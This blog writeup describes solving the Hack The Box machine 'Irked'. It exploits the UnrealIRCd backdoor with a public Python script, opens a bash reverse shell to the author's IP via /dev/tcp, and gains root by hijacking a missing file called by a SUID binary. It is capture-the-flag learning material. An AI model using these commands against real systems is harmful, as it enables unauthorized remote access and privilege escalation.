Skip to content

Hack The Box — Irked Writeup without Metasploit

Irked is based on ircd. It was fun while it lasted. but took me a lot of time to solve it. We will start with nmap as always

first checked port 80

IRC is almost working. That’s the first clue right there. We will try another method to confirm this

Time to Attack IRC. After searching and going through some exploits found something that really worked.

https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor the perfect exploit. He actually rewrote the whole thing with python. And he has done a great job. downloaded the script and edited it

you have to provide your ip address. I made a mistake while editing that gave me a lot of trouble. My actual IP was 10.10.14.4. But I wrote there 3 and it didn’t work properly. After a while checked it again and changed it. I make mistakes and yes I make lot of mistakes.

we need make sure netcat is listening to port 4444. python3 exploit.py -payload netcat 10.10.10.117 6697

And this happens. I do not have permission to view the file. Now I’m mad. After countless hours of waiting this is what happens.I needed a better shell forwarded the shell. bash -i >& /dev/tcp/10.10.14.4/4443 0>&1

Now we have a better shell. Atleast that’s what I think.

Ok I missed one screenshot which actually show that there was a .backup file which said something about steg.

I guess that means there was something hidden in that stupid looking picture in the website. But right now Im not bothered about it since I have a shell. Maybe this is the long way and that might have been a shortcut. Your more than welcome to try it but I wont try it.

Was poking around hoping that I might find some and I did. How lucky can I be?

And we all know /usr/bin/viewuser is not something normal. Let’s continue to explore the wonders of viewuser.

First thing file in the tmp folder is missing. Good for us. I missed another screenshot which shows that the file executes with root privileges. Better luck next time. So we create a file called listusers and we use one liner shell script to call for a root shell. Its purely evil.

echo '/bin/bash’ > /tmp/listusers

now we give executing rights to everyone

Time to call the scipt

And there you have it. It’s all done.

Published inHackinghacktheboxOSCP

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *